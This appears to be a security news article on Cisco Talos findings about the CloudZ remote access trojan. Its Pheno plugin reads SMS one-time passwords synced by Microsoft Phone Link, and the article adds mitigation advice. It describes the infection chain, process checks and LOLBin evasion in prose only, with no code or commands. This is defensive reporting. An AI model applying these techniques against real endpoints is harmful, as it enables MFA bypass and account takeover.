A malware campaign is exploiting a built-in Windows feature to intercept sensitive data — without ever touching the victim’s phone.
Cisco Talos researchers identified the CloudZ remote access trojan (RAT) using a custom plugin to monitor Microsoft’s Phone Link application and potentially capture SMS-based one-time passwords (OTPs).
“MFA bypass is becoming a bigger and bigger part of the compromise chain, as more people move to deploy it across a variety of accounts,” said Nick Biasini, Head of Outreach at Cisco Talos, in an email to eSecurityPlanet.
Nick explained, “This plugin is a new approach to MFA bypass by owning the communication channels that exist between your phone and computer.”
Key Takeaways
- Cisco Talos identified the CloudZ RAT abusing Microsoft Phone Link to intercept SMS-based one-time passwords (OTPs).
- Attackers can access synced mobile data directly from a Windows endpoint without compromising the victim’s phone.
- The malware uses the Pheno plugin to monitor Phone Link activity and extract locally stored authentication data.
- CloudZ relies on stealth techniques such as LOLBins, in-memory execution, and scheduled task persistence to evade detection.
- The campaign highlights growing risks tied to trusted cross-device integrations and SMS-based authentication.
CloudZ RAT Attack Overview
| Attack Component | Description |
| Targeted Feature | Microsoft Phone Link |
| Malware Used | CloudZ Remote Access Trojan (RAT) |
| Key Plugin | Pheno |
| Primary Goal | Intercept SMS OTPs and synced data |
| Initial Infection Method | Fake software update loader |
| Data Accessed | SMS messages, notifications, call logs |
| Evasion Techniques | LOLBins, in-memory execution, sandbox detection |
| Main Security Risk | Abuse of trusted cross-device integrations |
Inside the CloudZ Attack Chain
This attack targets a trusted cross-device feature embedded in Windows that many organizations rely on for productivity and seamless device integration.
By abusing Microsoft’s Phone Link application, attackers can bypass mobile security controls and access sensitive authentication data directly from the endpoint.
Cisco Talos reports the campaign has been active since early 2026, using modular tooling to scale across environments—especially those relying on SMS-based authentication and device sync.
How the CloudZ Malware Infection Begins
The intrusion chain begins with a malicious loader disguised as a legitimate software update.
Once executed, it deploys a .NET-based payload that installs the CloudZ remote access trojan (RAT), establishes persistence via scheduled tasks, and connects to a command-and-control (C2) server to receive instructions.
From there, the attacker can dynamically load additional capabilities, including the Pheno plugin.
How the Pheno Plugin Targets Phone Link Data
Pheno plays a critical role by scanning the system for active Phone Link processes such as YourPhone or PhoneExperienceHost.
If detected, it performs further checks to confirm whether an active proxy connection is in use — an indicator that the PC is actively syncing data with a paired mobile device.
Once confirmed, CloudZ can access locally stored SQLite database files that contain synchronized SMS messages, notifications, and call logs, effectively exposing sensitive data at rest on the endpoint.
Attackers Can Access SMS Messages and OTPs
This technique enables attackers to potentially intercept one-time passwords (OTPs) and other authentication data without ever compromising the mobile device itself.
The approach is effective because it abuses legitimate functionality and trusted system relationships between devices.
To remain stealthy, CloudZ incorporates multiple evasion techniques, including sandbox and debugger detection, dynamic in-memory execution, and the use of living-off-the-land binaries (LOLBins) such as PowerShell and bitsadmin to download additional payloads.
These tactics help the malware blend into normal activity, making detection harder and increasing the risk of prolonged access.
Key Steps to Reduce Exposure
To reduce exposure to threats like CloudZ, organizations should focus on limiting abuse of trusted features and strengthening endpoint visibility.
- Restrict or disable Phone Link in sensitive environments and limit access to synced mobile data.
- Replace SMS-based authentication with phishing-resistant MFA and enforce strong identity controls.
- Monitor endpoints for suspicious activity, including unusual processes, scheduled tasks, and LOLBin usage.
- Deploy EDR, SIEM, and DNS filtering to detect anomalies and block malicious infrastructure.
- Enforce application control, least privilege, and secure configurations to reduce the attack surface.
- Audit and govern cross-device sync tools and limit access to local data stores like SQLite files.
- Test incident response plans and use attack simulation tools with scenarios around trust abuse and endpoint compromise.
Implementing these measures together helps organizations build resilience and reduce exposure to attacks that exploit trusted systems and cross-device integrations.
Risks in Connected Systems
The CloudZ campaign highlights a broader trend of attackers leveraging legitimate features and integrations to gain access.
As organizations adopt more interconnected tools, these trust relationships introduce new risks, reinforcing the need to evaluate not just vulnerabilities, but how systems interact and share data.
These risks are why some organizations are adopting zero trust solutions that continuously validate access and limit implicit trust across systems.